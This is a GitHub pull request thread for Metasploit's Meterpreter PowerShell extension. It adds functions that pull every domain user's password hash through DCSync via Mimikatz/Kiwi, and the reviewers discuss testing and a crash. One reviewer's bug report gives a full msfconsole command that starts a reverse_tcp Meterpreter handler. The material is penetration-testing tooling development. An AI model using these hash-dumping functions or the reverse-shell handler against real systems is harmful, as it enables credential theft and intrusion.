New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add ability to dcsync & hashdump via Powershell #284

Merged
merged 3 commits into from May 17, 2018

Conversation

Projects
None yet
3 participants
@OJ
Contributor

OJ commented May 7, 2018

Description

This PR makes use of the fact that DCSync functionality is exposed via Kiwi, and from this it is possible to enumerate all users in the domain and dump each user's hash one by one. This means that it's possible to remotely dump all the hashes in a target DC using DCsync instead of having to get onto the DC and use the typical methods.

This code has a few extension functions built into the runner, and also has some baked-in powershell functions that are available in every powershell runner session in the host.

I've also added a powershell version of the build command that lets us generate the source to the powershell assembly wiring from PSH as well as Python.

I haven't exposed this feature in any other way just yet, for $REASONS. I will consider other options at some point, but for now this should be useful. Here's a demo of it running on a domain-joined machine that isn't a DC.

image

The addition of the following built-in functions should make interacting with the functionality much easier:

  • Invoke-DcSync
  • Invoke-DcSyncAll
  • Invoke-DcSyncHashDump

Note 1

This rework has juggled with how powershel_shell works. It now does the commands on a separate thread and let's the UI receive a response. This allows the work to be done behind the scenes and streamed back via the channel. This allows for long running processes to run. Woo!

Note 2

I've commented out the support for creds_all in both PSH and Python bindings because they don't work after the rejig of the Kiwi source to use the Mimikatz subrepo. I'll work on getting it going again in both cases. So watch this space.

Validation

  • Make sure that the classic usages still work (powershell_import, powershell_execute) with different session IDs.
  • Validate that powershell_shell behaves appropriately with short or single-shot commands.
  • Validate that powershell_shell doesn't hang when long running commands are run.
  • Validate that Get-ChildItem function:\ | Select Name | sls 'DcSync' shows the list of newly baked-in powershell scripts.
  • Validate that each script has appropriate documentation via the Get-Help commandlet.
  • Validate that each of the new scripts works as advertised.
  • Validate that x64 is fine.
  • Validate that x86 is fine.

@OJ OJ requested a review from busterb May 7, 2018

@OJ OJ force-pushed the OJ:powershell-add-hashdump-dcsync branch from d6cb38d to fbb8f6f May 7, 2018

Add ability to dcsync & hashdump via Powershell
DCSync functionality is exposed, and from this it is possible to enumerate all users in the domain and dump each user's hash one by one. This code has a few extension functions built into the runner, and also has some baked-in powershell functions that are available in every powershell runner session in the host.

I've also added a powershell version of the build command that lets us generate the source to the powershell assembly wiring from PSH as well as Python.

@OJ OJ force-pushed the OJ:powershell-add-hashdump-dcsync branch from fbb8f6f to f44877a May 7, 2018

Rework powershell_shell to work with "streaming"
This commit changes the channel functionality within the powershell extension so that commands do execute behind the scenes and stream the results to the UI in the current channel.

This comes with the caveat that users are patient. I haven't yet made sure that running separate commands while long running ones are running will not cause problems. We'll have to see.

@OJ OJ force-pushed the OJ:powershell-add-hashdump-dcsync branch from 4f413dc to 90265c5 May 7, 2018

@OJ

This comment has been minimized.

Contributor

OJ commented May 14, 2018

cough BUMP! 😈

Change hash output to use LM hash if present
The previous commit hard coded the LM hash to the empty value. This commit changes this so that if the LM hash isn't present it'll manually specify the empty one, but use the existing one if it is present.

@busterb busterb self-assigned this May 17, 2018

@busterb

This comment has been minimized.

Contributor

busterb commented May 17, 2018

Code review spots nothing obviously wrong. Let's test this.

@@ -538,6 +569,151 @@ DWORD powershell_channel_close(Channel* channel, Packet* request, LPVOID context
return ERROR_SUCCESS;
}
DWORD channelise_session(wchar_t* sessionId, Channel* channel, LPVOID context)

This comment has been minimized.

@busterb

busterb May 17, 2018

Contributor

you win this time channelise

This comment has been minimized.

@wvu-r7

wvu-r7 May 17, 2018

Contributor

Clearly @OJ named this function.

This comment has been minimized.

@OJ

OJ May 17, 2018

Contributor

Don't abuse our beloved language with unnecessary zzzzzz's!

0x80, 0x02, 0x33, 0x00, 0xa5, 0x2c, 0x00, 0x00, 0x00, 0x00, 0x86, 0x08,
0x7e, 0x0b, 0x3a, 0x03, 0x34, 0x00, 0xad, 0x2c, 0x00, 0x00, 0x00, 0x00,
0x86, 0x08, 0x86, 0x0b, 0x3e, 0x03, 0x34, 0x00, 0xb6, 0x2c, 0x00, 0x00,
0x00, 0x00, 0x86, 0x08, 0x8e, 0x0b, 0x3a, 0x03, 0x35, 0x00, 0xbe, 0x2c

This comment has been minimized.

@busterb

busterb May 17, 2018

Contributor

I had a wild hair earlier that maybe this could be reworked to use a resource file rather than converting to a C string in some future PR.

This comment has been minimized.

@OJ

OJ May 17, 2018

Contributor

Resources come with a diff set of issues, esp when reflectively loading DLLs. This was "simpler". :)

@busterb

This comment has been minimized.

Contributor

busterb commented May 17, 2018

Seems fine enough to get a gem going.

@busterb busterb merged commit 1e175da into rapid7:master May 17, 2018

1 check passed

continuous-integration/travis-ci/pr The Travis CI build passed
Details

busterb added a commit that referenced this pull request May 17, 2018

@OJ

This comment has been minimized.

Contributor

OJ commented May 17, 2018

Much ❤️ to both of you!

@OJ OJ deleted the OJ:powershell-add-hashdump-dcsync branch May 17, 2018

@busterb

This comment has been minimized.

Contributor

busterb commented May 17, 2018

Well, I found a post-landing beug in the light of the morning (Windows 10 latest) with metasploit-framework head.

./msfconsole -qx 'use multi/handler; set payload windows/meterpreter/reverse_tcp; set lhost 192.168.56.1; run'
...
meterpreter > powershell_shell 
PS > ls

[*] 10.0.2.15 - Meterpreter session 1 closed.  Reason: Died

It's not in framework yet as a gem bump, so not a big deal. Taking a look to see what needs to be done to fix it up.

@busterb

This comment has been minimized.

Contributor

busterb commented May 17, 2018

[584] [1b70] [COMMAND] Calling completion handlers... 
[584] [1b70] [COMMAND] Completion handlers finished for core_channel_write. 
[584] [1b70] [COMMAND] Packet is not local, destroying 
[584] [1b70] [COMMAND] Packet destroyed 
[584] [1b70] [COMMAND] Command processing finishing. Returning: TRUE 
[584] [1b70] [COMMAND] Executed inline -> Commands: 02822AB8 Command1: 00A74020 Command2: 00000000 
[584] [1b70] [COMMAND] Cleaning up commands 
[584] CLR: Managed code called FailFast, saying "
[584] Attempted to read or write protected memory. This is often an indication that other memory is corrupt.
[584] " 
@OJ

This comment has been minimized.

Contributor

OJ commented May 17, 2018

Was that x64?

@busterb

This comment has been minimized.

Contributor

busterb commented May 17, 2018

32-bit windows/meterpreter/reverse_tcp

@OJ

This comment has been minimized.

Contributor

OJ commented May 21, 2018

Did you end up looking at this again @busterb or do I need to jump in and figure it out?

@busterb

This comment has been minimized.

Contributor

busterb commented May 21, 2018

Hi. I just refreshed to ask the same question :) I have not other than to have reviewed some of the memory allocations for obvious faults.

@OJ

This comment has been minimized.

Contributor

OJ commented May 21, 2018

I've just fixed it :) PR coming!

@busterb

This comment has been minimized.

Contributor

busterb commented May 21, 2018

🥇 thanks!

busterb added a commit to busterb/metasploit-framework that referenced this pull request May 21, 2018

update kiwi plugin, add dcshadow and powershell streaming support
This does a few things:

 1. Updates the kiwi plugin to mimikatz 2.1.1 20180502
 2. Adds ability to dcsync & hashdump via Powershell
 3. Adds streaming support to powershell commands (no more timeouts)

It also adds the following powershell functions to make things more
convenient:

 * Invoke-DcSync
 * Invoke-DcSyncAll
 * Invoke-DcSyncHashDump

See rapid7/metasploit-payloads#284 for details
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment